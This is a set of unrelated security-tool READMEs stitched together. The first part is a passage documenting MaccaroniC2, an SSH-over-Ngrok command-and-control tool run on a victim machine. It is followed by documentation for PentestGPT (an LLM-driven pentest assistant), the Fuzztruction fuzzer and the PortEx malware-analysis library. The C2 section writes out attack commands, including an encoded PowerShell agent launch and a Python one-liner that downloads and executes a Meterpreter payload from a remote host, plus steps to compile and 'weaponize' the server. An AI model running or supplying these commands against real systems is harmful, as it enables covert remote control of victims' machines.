  1. Run python3 gen_rsa.py to generate a pair of SSH keys. The newly generated id_rsa is used by the attacker to connect to the server running on the victim's machine.

  2. Edit the asyncssh_server.py file and place the contents of the newly generated id_rsa.pub inside the pub_key variable. asyncssh_server.py provides an implementation of the SSHv2 protocol with SFTP and SCP features. This is the script run by the victim.

  3. Create a free account on Ngrok site and take note of the AUTH Token.

  4. Add the AUTH token to the token variable in asyncssh_server.py; it needs to be hardcoded inside the ngrok_tunnel() function.

  5. Create a free API key on the Ngrok website. Take note of the generated string.

  6. Put the API key string in the api_key variable inside the async_commander.py file. This allows us to automatically retrieve the Ngrok domain and port of the active tunnel during automation.

  7. Perform the same step for get_endpoints.py file. This script retrieves various useful information about active tunnels.

Send commands to server

With async_commander.py you can send any command to the server. It automatically retrieves the domain and port of the Ngrok tunnel opened by the victim using the official Ngrok API.

Please also note that id_rsa needs to be in the same folder as async_commander.py.
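
For illustration, below is a rough sketch of what the commander does under the hood. It assumes the tunnel host and port have already been retrieved via the Ngrok API (as get_endpoints.py does) and uses AsyncSSH directly; the username is arbitrary because the PoC server only checks the key, as noted in the SFTP/SCP examples further down, and the host/port values are placeholders.

import asyncio
import asyncssh

async def run_command(host, port, command):
    # Any username works; authentication relies solely on id_rsa.
    async with asyncssh.connect(host, port=port, username='ddddd',
                                client_keys=['id_rsa'], known_hosts=None) as conn:
        result = await conn.run(command)
        return result.stdout

# host/port come from the active Ngrok tunnel (illustrative values).
print(asyncio.run(run_command('0.tcp.ngrok.io', 12345, 'whoami')))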

Basic Usage

Run server on victim machine:

python3 asyncssh_server.py


From the attacker machine send command using socks proxy:

python3 asyncssh_commander.py "ls -la" --proxy socks5://127.0.0.1:9050


Send command without using a proxy:

python3 asyncssh_commander.py "whoami"


Spawn another C2 agent (Powershell-Empire, Meterpreter, etc):

python3 asyncssh_commander.py "powershell.exe -e ABJe...dhYte"

Meterpreter web_delivery module

python3 asyncssh_commander.py "python3 -c \"import sys; import ssl; u=__import__('urllib'+{2:'',3:'.request'}[sys.version_info[0]], fromlist=('urlopen',)); r=u.urlopen('http://100.100.100.100:8080/YnrVekAsVF', context=ssl._create_unverified_context()); exec(r.read());\""


Get list of active tunnels:

python3 get_endpoints.py


Generate new RSA key pairs:

python3 gen_rsa.py

Advanced Usage

Using SFTP and SCP - you don't need a valid username, just the correct id_rsa:

  • With proxy:

proxychains sftp -P NGROK_PORT -i id_rsa ddddd@NGROK_HOST

scp -i id_rsa -o ProxyCommand="nc -x localhost:9050 %h NGROK_PORT" source_file ddddd@NGROK_HOST:destination_path


  • No proxy:

sftp -P PORT -i id_rsa ddddd@NGROK_HOST

scp -i id_rsa -P PORT source_file ddddd@NGROK_HOST:destination_path


Compiling with Nuitka

python -m pip install nuitka

python -m nuitka --standalone --onefile asyncssh_server.py


Weaponized server

https://github.com/hacktivesec/MaccaroniC2/blob/main/weaponized_server.py

For further information, check the related article: https://blog.hacktivesecurity.com/index.php/2023/06/05/inside-the-mind-of-a-cyber-attacker-from-malware-creation-to-data-exfiltration-part-1/

DISCLAIMER: This tool is intended for testing and educational purposes only. It should only be used on systems with proper authorization. Any unauthorized or illegal use of this tool is strictly prohibited. The creator of this tool holds no responsibility for any misuse or damage caused by its usage. Please ensure compliance with applicable laws and regulations while utilizing this tool. Additionally, it’s important to note that the usage of Ngrok in conjunction with this tool may result in the violation of the terms of service or policies of certain platforms. It is advisable to review and comply with the terms of use of any platform or service to avoid potential account bans or disruptions.



PentestGPT - A GPT-empowered Penetration Testing Tool

By: Zion3R


A GPT-empowered penetration testing tool.

Common Questions

  • Q: What is PentestGPT?
    • A: PentestGPT is a penetration testing tool empowered by ChatGPT. It is designed to automate the penetration testing process. It is built on top of ChatGPT and operates in an interactive mode to guide penetration testers in both overall progress and specific operations.
  • Q: Do I need to be a ChatGPT plus member to use PentestGPT?
    • A: Yes. PentestGPT relies on the GPT-4 model for high-quality reasoning. Since there is no public GPT-4 API yet, a wrapper is included that uses a ChatGPT session to support PentestGPT. You may also use the GPT-4 API directly if you have access to it.
  • Q: Why GPT-4?
    • A: After empirical evaluation, we found that GPT-4 performs better than GPT-3.5 in terms of penetration testing reasoning. In fact, GPT-3.5 leads to failed tests in simple tasks.
  • Q: Why not just use GPT-4 directly?
    • A: We found that GPT-4 suffers from loss of context as the test goes deeper. It is essential to maintain a "test status awareness" in this process. You may check the PentestGPT design here for more details.
  • Q: What about AutoGPT?
    • A: AutoGPT is not designed for pentesting. It may perform malicious operations. Due to this consideration, we designed PentestGPT to run in an interactive mode. Of course, our end goal is an automated pentest solution.
  • Q: Future plan?
    • A: We're working on a paper to explore the tech details behind automated pentest. Meanwhile, please feel free to raise issues/discussions. I'll do my best to address all of them.

Getting Started

  • PentestGPT is a penetration testing tool empowered by ChatGPT.
  • It is designed to automate the penetration testing process. It is built on top of ChatGPT and operates in an interactive mode to guide penetration testers in both overall progress and specific operations.
  • PentestGPT is able to solve easy to medium HackTheBox machines, and other CTF challenges. You can check this example in resources where we use it to solve HackTheBox challenge TEMPLATED (web challenge).
  • A sample testing process of PentestGPT on a target VulnHub machine (Hackable II) is available here.
  • A sample usage video is below: (or available here: Demo)

Installation

Before installation, we recommend taking a look at this installation video if you want to use the cookie setup.

  1. Install requirements.txt with pip install -r requirements.txt
  2. Configure the cookies in config. You may start from the sample: cp config/chatgpt_config_sample.py config/chatgpt_config.py (a hypothetical sketch of the resulting file follows this list).
    • If you're using a cookie, please watch this video: https://youtu.be/IbUcj0F9EBc. The general steps are:
      • Login to ChatGPT session page.
      • In Inspect - Network, find the connections to the ChatGPT session page.
      • Find the cookie in the request header of the request to https://chat.openai.com/api/auth/session and paste it into the cookie field of config/chatgpt_config.py. (In Inspect -> Network, find the session request and copy the cookie field from its request headers.)
      • Note that the other fields are temporarily deprecated due to the update of ChatGPT page.
      • Fill in userAgent with your user agent.
    • If you're using API:
      • Fill in the OpenAI API key in chatgpt_config.py.
  3. To verify that the connection is configured properly, you may run python3 test_connection.py. You should see some sample conversation with ChatGPT.
    • A sample output is below
    1. You're connected with ChatGPT Plus cookie. 
    To start PentestGPT, please use <python3 main.py --reasoning_model=gpt-4>
    ## Test connection for OpenAI api (GPT-4)
    2. You're connected with OpenAI API. You have GPT-4 access. To start PentestGPT, please use <python3 main.py --reasoning_model=gpt-4 --useAPI>
    ## Test connection for OpenAI api (GPT-3.5)
    3. You're connected with OpenAI API. You have GPT-3.5 access. To start PentestGPT, please use <python3 main.py --reasoning_model=gpt-3.5-turbo --useAPI>
  4. (Notice) The above verification process is for the cookie setup. If you encounter errors after several attempts, try refreshing the page, repeating the above steps, and trying again. You may also try using the cookie for https://chat.openai.com/backend-api/conversations. Please submit an issue if you encounter any problems.
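
As referenced in step 2, below is a hypothetical sketch of what config/chatgpt_config.py may contain. The shipped chatgpt_config_sample.py is authoritative; only the cookie, userAgent, and OpenAI API key values are mentioned in this README, and the exact layout and field name for the API key are assumptions.

# config/chatgpt_config.py -- illustrative sketch only; adapt from chatgpt_config_sample.py
cookie = '<cookie copied from the request to https://chat.openai.com/api/auth/session>'
userAgent = '<your browser user agent>'
openai_key = '<OpenAI API key, only needed with --useAPI>'  # field name is an assumption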

Usage

  1. To start, run python3 main.py --args.
    • --reasoning_model is the reasoning model you want to use.
    • --useAPI is whether you want to use OpenAI API.
    • You're recommended to use the combination as suggested by test_connection.py, which are:
      • python3 main.py --reasoning_model=gpt-4
      • python3 main.py --reasoning_model=gpt-4 --useAPI
      • python3 main.py --reasoning_model=gpt-3.5-turbo --useAPI
  2. The tool works similarly to msfconsole. Follow the guidance to perform penetration testing.
  3. In general, PentestGPT intakes commands similar to chatGPT. There are several basic commands.
    1. The commands are:
      • help: show the help message.
      • next: key in the test execution result and get the next step.
      • more: let PentestGPT explain more details of the current step. Also, a new sub-task solver will be created to guide the tester.
      • todo: show the todo list.
      • discuss: discuss with the PentestGPT.
      • google: search on Google. This function is still under development.
      • quit: exit the tool and save the output as log file (see the reporting section below).
    2. You can use <SHIFT + right arrow> to end your input (and <ENTER> is for a new line).
    3. You may always use TAB to autocomplete the commands.
    4. When you're given a drop-down selection list, you can use cursor or arrow key to navigate the list. Press ENTER to select the item. Similarly, use <SHIFT + right arrow> to confirm selection.
  4. In the sub-task handler initiated by more, users can execute additional commands to investigate a specific problem:
    1. The commands are:
      • help: show the help message.
      • brainstorm: let PentestGPT brainstorm on the local task for all the possible solutions.
      • discuss: discuss with PentestGPT about this local task.
      • google: search on Google. This function is still under development.
      • continue: exit the subtask and continue the main testing session.

Report and Logging

  1. After finishing the penetration test, a report will be automatically generated in the logs folder (if you quit with the quit command).
  2. The report can be printed in a human-readable format by running python3 utils/report_generator.py <log file>. A sample report sample_pentestGPT_log.txt is also uploaded.

Contributing

Contributions are what make the open source community such an amazing place to learn, inspire, and create. Any contributions you make are greatly appreciated.

If you have a suggestion that would make this better, please fork the repo and create a pull request. You can also simply open an issue with the tag "enhancement". Don't forget to give the project a star! Thanks again!

  1. Fork the Project
  2. Create your Feature Branch (git checkout -b feature/AmazingFeature)
  3. Commit your Changes (git commit -m 'Add some AmazingFeature')
  4. Push to the Branch (git push origin feature/AmazingFeature)
  5. Open a Pull Request

License

Distributed under the MIT License. See LICENSE.txt for more information.

Contact

Gelei Deng - gelei.deng@ntu.edu.sg



Fuzztruction - Prototype Of A Fuzzer That Does Not Directly Mutate Inputs (As Most Fuzzers Do) But Instead Uses A So-Called Generator Application To Produce An Input For Our Fuzzing Target

By: Zion3R

Fuzztruction is an academic prototype of a fuzzer that does not directly mutate inputs (as most fuzzers do) but instead uses a so-called generator application to produce an input for our fuzzing target. As programs generating data usually produce the correct representation, our fuzzer mutates the generator program (by injecting faults), such that the data produced is almost valid. Optimally, the produced data passes the parsing stages in our fuzzing target, called the consumer, but triggers unexpected behavior in deeper program logic. This makes it possible to fuzz even targets that utilize cryptographic primitives such as encryption or message integrity codes. The main advantage of our approach is that it generates complex data without requiring heavyweight program analysis techniques, grammar approximations, or human intervention.

For instructions on how to reproduce the experiments from the paper, please read the fuzztruction-experiments submodule documentation after reading this document.

Compatibility: While we try to make sure that our prototype is as platform independent as possible, we are not able to test it on all platforms. Thus, if you run into issues, please use Ubuntu 22.04.1, which was used during development as the host system.


Quickstart

# Clone the repository
git clone --recurse-submodules https://github.com/fuzztruction/fuzztruction.git

# Option 1: Get a pre-built version of our runtime environment.
# To ease reproduction of experiments in our paper, we recommend using our
# pre-built environment to avoid incompatibilities (~30 GB of data will be
# downloaded)
# Do NOT use this if you don't want to reproduce our results but instead fuzz
# own targets (use the next command instead).
./env/pull-prebuilt.sh

# Option 2: Build the runtime environment for Fuzztruction from scratch.
# Do NOT run this if you executed pull-prebuilt.sh
./env/build.sh

# Spawn a container based on the image built/pulled before.
# To spawn a container using the prebuilt image (if pulled above),
# you need to set USE_PREBUILT to 1, e.g., `USE_PREBUILT=1 ./env/start.sh`
./env/start.sh

# Calling this script again will spawn a shell inside the container.
# (can be called multiple times to spawn multiple shells within the same
# container).
./env/start.sh

# Running start.sh a second time will automatically build the fuzzer.

# See `Fuzzing a Target using Fuzztruction` below for further instructions.

Components

Fuzztruction contains the following core components:

Scheduler

The scheduler orchestrates the interaction of the generator and the consumer. It governs the fuzzing campaign, and its main task is to organize the fuzzing loop. In addition, it also maintains a queue containing queue entries. Each entry consists of the seed input passed to the generator (if any) and all mutations applied to the generator. Each such queue entry represents a single test case. In traditional fuzzing, such a test case would be represented as a single file. The implementation of the scheduler is located in the scheduler directory.

Generator

The generator can be considered a seed generator for producing inputs tailored to the fuzzing target, the consumer. While common fuzzing approaches mutate inputs on the fly through bit-level mutations, we mutate inputs indirectly by injecting faults into the generator program. More precisely, we identify and mutate data operations the generator uses to produce its output. To facilitate our approach, we require a program that generates outputs that match the input format the fuzzing target expects.

The implementation of the generator can be found in the generator directory. It consists of two components that are explained in the following.

Compiler Pass

The compiler pass (generator/pass) instruments the target using so-called patch points. Since the current implementation of this feature (tested on LLVM 12 and below) is unstable, we patch LLVM to enable it for our approach. The patches can be found in the llvm repository (included here as a submodule). Please note that the patches are experimental and not intended for use in production.

The locations of the patch points are recorded in a separate section inside the compiled binary. The code related to parsing this section can be found at lib/llvm-stackmap-rs, which we also published on crates.io.

During fuzzing, the scheduler chooses a target from the set of patch points and passes its decision down to the agent (described below) responsible for applying the desired mutation for the given patch point.

Agent

The agent, implemented in generator/agent, runs in the context of the generator application that was compiled with the custom compiler pass. Its main tasks are implementing a forkserver and communicating with the scheduler. Based on the instructions passed from the scheduler via shared memory and a message queue, the agent uses a JIT engine to mutate the generator.

Consumer

The generator's counterpart is the consumer: It is the target we are fuzzing that consumes the inputs generated by the generator. For Fuzztruction, it is sufficient to compile the consumer application with AFL++'s compiler pass, which we use to record the coverage feedback. This feedback guides our mutations of the generator.

Preparing the Runtime Environment (Docker Image)

Before using Fuzztruction, the runtime environment that comes as a Docker image is required. This image can be obtained by building it yourself locally or pulling a pre-built version. Both ways are described in the following. Before preparing the runtime environment, this repository, and all sub repositories, must be cloned:

git clone --recurse-submodules https://github.com/fuzztruction/fuzztruction.git

Local Build

The Fuzztruction runtime environment can be built by executing env/build.sh. This builds a Docker image containing a complete runtime environment for Fuzztruction locally. By default, a pre-built version of our patched LLVM version is used and pulled from Docker Hub. If you want to use a locally built LLVM version, check the llvm directory.

Pre-built

In most cases, there is no particular reason for using the pre-built environment -- except if you want to reproduce the exact experiments conducted in the paper. The pre-built image provides everything, including the pre-built evaluation targets and all dependencies. The image can be retrieved by executing env/pull-prebuilt.sh.

The following section documents how to spawn a runtime environment based on either a locally built image or the prebuilt one. Details regarding the reproduction of the paper's experiments can be found in the fuzztruction-experiments submodule.

Managing the Runtime Environment Lifecycle

After building or pulling a pre-built version of the runtime environment, the fuzzer is ready to use. The fuzzer's environment lifecycle is managed by a set of scripts located in the env folder.

Script Description
./env/start.sh Spawn a new container or spawn a shell into an already running container. Prebuilt: Exporting USE_PREBUILT=1 spawns a container based on a pre-built environment. For switching from pre-build to local build or the other way around, stop.sh must be executed first.
./env/stop.sh This stops the container. Remember to call this after rebuilding the image.

Using start.sh, an arbitrary number of shells can be spawned in the container. Using Visual Studio Code's Containers extension allows you to work conveniently inside the Docker container.

Several files/folders are mounted from the host into the container to facilitate data exchange. Details regarding the runtime environment are provided in the next section.

Runtime Environment Details

This section details the runtime environment (Docker container) provided alongside Fuzztruction. The user in the container is named user and has passwordless sudo access per default.

Permissions: The Docker image's user is named user and has the same User ID (UID) as the user who initially built the image. Thus, mounts from the host can be accessed inside the container. However, in the case of using the pre-built image, this might not be the case, since the image was built on another machine. This must be considered when exchanging data with the host.

Inside the container, the following paths are (bind) mounted from the host:

  • /home/user/fuzztruction (host: ./): Pre-built: this folder is part of the image in case the pre-built image is used; thus, changes are not reflected to the host.
  • /home/user/shared (host: ./): Used to exchange data with the host.
  • /home/user/.zshrc (host: ./data/zshrc)
  • /home/user/.zsh_history (host: ./data/zsh_history)
  • /home/user/.bash_history (host: ./data/bash_history)
  • /home/user/.config/nvim/init.vim (host: ./data/init.vim)
  • /home/user/.config/Code (host: ./data/vscode-data): Used to persist the Visual Studio Code config between container restarts.
  • /ssh-agent (host: $SSH_AUTH_SOCK): Allows using the SSH agent inside the container if it runs on the host.
  • /home/user/.gitconfig (host: /home/$USER/.gitconfig): Use the gitconfig from the host, if there is any.
  • /ccache (host: ./data/ccache): Used to persist the ccache cache between container restarts.

Usage

After building the Docker runtime environment and spawning a container, the Fuzztruction binary itself must be built. This build is triggered automatically when a shell is spawned inside the container via ./env/start.sh, so the steps in the next section are primarily relevant if you want to rebuild Fuzztruction after modifying the code.

Building Fuzztruction

For building Fuzztruction, it is sufficient to call cargo build in /home/user/fuzztruction. This will build all components described in the Components section. The most interesting build artifacts are the following:

  • ./generator/pass/fuzztruction-source-llvm-pass.so: The LLVM pass used to insert the patch points into the generator application. Note: the location of the pass is recorded in /etc/ld.so.conf.d/fuzztruction.conf; thus, compilers are able to find the pass during compilation. If you run into trouble because the pass is not found, run sudo ldconfig and retry using a freshly spawned shell.
  • ./generator/pass/fuzztruction-source-clang-fast: A compiler wrapper for compiling the generator application. This wrapper uses our custom compiler pass, links the target against the agent, and injects a call to the agent's init method into the generator's main.
  • ./target/debug/libgenerator_agent.so: The agent that is injected into the generator application.
  • ./target/debug/fuzztruction: The fuzztruction binary representing the actual fuzzer.
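Putting it together, a rebuild cycle inside the container might look like this (a minimal sketch based on the steps above):

cd /home/user/fuzztruction
cargo build
sudo ldconfig   # only needed if the compiler pass is not found (see the note above)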

Fuzzing a Target using Fuzztruction

We will use libpng as an example to showcase Fuzztruction's capabilities. Since libpng is relatively small and has no external dependencies, the pre-built image is not required for the following steps. Note, however, that especially on mobile CPUs, building the AFL++ binary may take up to several hours because of the collision-free coverage map encoding and comparison splitting features.

Building the Target

Pre-built: If the pre-built version is used, building is unnecessary and this step can be skipped.
Switch into the fuzztruction-experiments/comparison-with-state-of-the-art/binaries/ directory and execute ./build.sh libpng. This will pull the source and start the build according to the steps defined in libpng/config.sh.
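That is (paths as given above):

cd fuzztruction-experiments/comparison-with-state-of-the-art/binaries/
./build.sh libpng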

Benchmarking the Target

The following command allows you to test whether the target works:

sudo ./target/debug/fuzztruction fuzztruction-experiments/comparison-with-state-of-the-art/configurations/pngtopng_pngtopng/pngtopng-pngtopng.yml  --purge --show-output benchmark -i 100

Each target is defined using a YAML configuration file. The files are located in the configurations directory and are a good starting point for building your own config. The pngtopng-pngtopng.yml file is extensively documented.

Troubleshooting

If the fuzzer terminates with an error, there are multiple ways to assist your debugging efforts.

  • Passing --show-output to fuzztruction allows you to observe stdout/stderr of the generator and the consumer if they are not used for passing or reading data from each other.
  • Setting AFL_DEBUG in the env section of the sink in the YAML config can give you a more detailed output regarding the consumer.
  • Executing the generator and consumer manually, using the same flags as in the config file, might reveal typos in the command line used to execute the application. If LD_PRELOAD is used, double-check the provided paths.

Running the Fuzzer

To start the fuzzing process, executing the following command is sufficient:

sudo ./target/debug/fuzztruction ./fuzztruction-experiments/comparison-with-state-of-the-art/configurations/pngtopng_pngtopng/pngtopng-pngtopng.yml fuzz -j 10 -t 10m

This will start a fuzzing run on 10 cores, with a timeout of 10 minutes. Output produced by the fuzzer is stored in the directory defined by the work-directory attribute in the target's config file. In case of pngtopng, the default location is /tmp/pngtopng-pngtopng.

If the working directory already exists, --purge must be passed as an argument to fuzztruction to allow it to rerun. The flag must be passed before the subcommand, i.e., before fuzz or benchmark.
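For example, to rerun the campaign from above against an existing working directory (same command as before, with --purge added in front of the subcommand):

sudo ./target/debug/fuzztruction ./fuzztruction-experiments/comparison-with-state-of-the-art/configurations/pngtopng_pngtopng/pngtopng-pngtopng.yml --purge fuzz -j 10 -t 10m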

Combining Fuzztruction and AFL++

For running AFL++ alongside Fuzztruction, the aflpp subcommand can be used to spawn AFL++ workers that are reseeded during runtime with inputs found by Fuzztruction. Assuming that Fuzztruction was executed using the command above, it is sufficient to execute

sudo ./target/debug/fuzztruction ./fuzztruction-experiments/comparison-with-state-of-the-art/configurations/pngtopng_pngtopng/pngtopng-pngtopng.yml aflpp -j 10 -t 10m

for spawning 10 AFL++ processes that are terminated after 10 minutes. Inputs found by Fuzztruction and AFL++ are periodically synced into the interesting folder in the working directory. If AFL++ should be executed independently, but based on the same .yml configuration file, the --suffix argument can be used to append a suffix to the working directory of the spawned fuzzer.

Computing Coverage

After the fuzzing run has terminated, the tracer subcommand allows you to retrieve a list of covered basic blocks for all interesting inputs found during fuzzing. These traces are stored in the traces subdirectory of the working directory. Each trace contains a zlib-compressed JSON object listing the addresses of all basic blocks (in execution order) exercised during execution, along with metadata that maps the addresses to the ELF files they are located in.

The coverage tool located at ./target/debug/coverage can be used to process the collected data further. You need to pass it the top-level directory containing working directories created by Fuzztruction (e.g., /tmp in case of the previous example). Executing ./target/debug/coverage /tmp will generate a .csv file that maps time to the number of covered basic blocks and a .json file that maps timestamps to sets of found basic block addresses. Both files are located in the working directory of the specific fuzzing run.
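Assuming the pngtopng run from above, the two steps might look as follows; the tracer invocation is a sketch that follows the same config-file/subcommand pattern as fuzz and benchmark, so its exact options may differ:

sudo ./target/debug/fuzztruction ./fuzztruction-experiments/comparison-with-state-of-the-art/configurations/pngtopng_pngtopng/pngtopng-pngtopng.yml tracer
./target/debug/coverage /tmp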



PortEx - Java Library To Analyse Portable Executable Files With A Special Focus On Malware Analysis And PE Malformation Robustness


PortEx is a Java library for static malware analysis of Portable Executable files. Its focus is on PE malformation robustness and anomaly detection. PortEx is written in Java and Scala, and targeted at Java applications.

Features

  • Reading header information from: MSDOS Header, COFF File Header, Optional Header, Section Table
  • Reading PE structures: Imports, Resources, Exports, Debug Directory, Relocations, Delay Load Imports, Bound Imports
  • Dumping of sections, resources, overlay, embedded ZIP, JAR or .class files
  • Scanning for file format anomalies, including structural anomalies and deprecated, reserved, wrong or non-default values.
  • Visualize PE file structure, local entropies and byteplot of the file with variable colors and sizes
  • Calculate Shannon Entropy and Chi Squared for files and sections
  • Calculate ImpHash and Rich and RichPV hash values for files and sections
  • Parse RichHeader and verify checksum
  • Calculate and verify Optional Header checksum
  • Scan for PEiD signatures, internal file type signatures or your own signature database
  • Scan for Jar to EXE wrapper (e.g. exe4j, jsmooth, jar2exe, launch4j)
  • Extract Unicode and ASCII strings contained in the file
  • Extraction and conversion of .ICO files from icons in the resource section
  • Extraction of version information and manifest from the file
  • Reading .NET metadata and streams (Alpha)

For more information, have a look at the PortEx Wiki and the Documentation.

PortexAnalyzer CLI and GUI

PortexAnalyzer CLI is a command-line tool that uses the PortEx library under the hood. If you are looking for a ready-to-use command-line PE scanner, download it here: PortexAnalyzer.jar
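A typical invocation might look like this (a sketch; the sample name is hypothetical and the available options may differ between releases):

$ java -jar PortexAnalyzer.jar suspicious.exe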

The GUI version is available here: PortexAnalyzerGUI

Using PortEx

Including PortEx in a Maven Project

You can include PortEx in your project by adding the following Maven dependency:

<dependency>
    <groupId>com.github.katjahahn</groupId>
    <artifactId>portex_2.12</artifactId>
    <version>4.0.0</version>
</dependency>

To use a local build, add the library as follows:

<dependency>
    <groupId>com.github.katjahahn</groupId>
    <artifactId>portex_2.12</artifactId>
    <version>4.0.0</version>
    <scope>system</scope>
    <systemPath>$PORTEXDIR/target/scala-2.12/portex_2.12-4.0.0.jar</systemPath>
</dependency>

Including PortEx in an SBT Project

Add the dependency to your build.sbt as follows:

libraryDependencies += "com.github.katjahahn" % "portex_2.12" % "4.0.0"

Building PortEx

Requirements

PortEx is built with sbt.

Compile and Build With sbt

To compile the project, invoke:

$ sbt compile

To create a jar:

$ sbt package

To build a fat JAR that can be used as a command-line tool, type:

$ sbt assembly

Create Eclipse Project

You can create an Eclipse project by using the sbteclipse plugin. Add the following line to project/plugins.sbt:

addSbtPlugin("com.typesafe.sbteclipse" % "sbteclipse-plugin" % "2.4.0")

Generate the project files for Eclipse:

$ sbt eclipse

Import the project to Eclipse via the Import Wizard.

Donations

I develop PortEx and PortexAnalyzer as a hobby in my free time. If you like it, please consider buying me a coffee: https://ko-fi.com/struppigel

Author

Karsten Hahn

Twitter: @Struppigel

Mastodon: struppigel@infosec.exchange

Youtube: MalwareAnalysisForHedgehogs


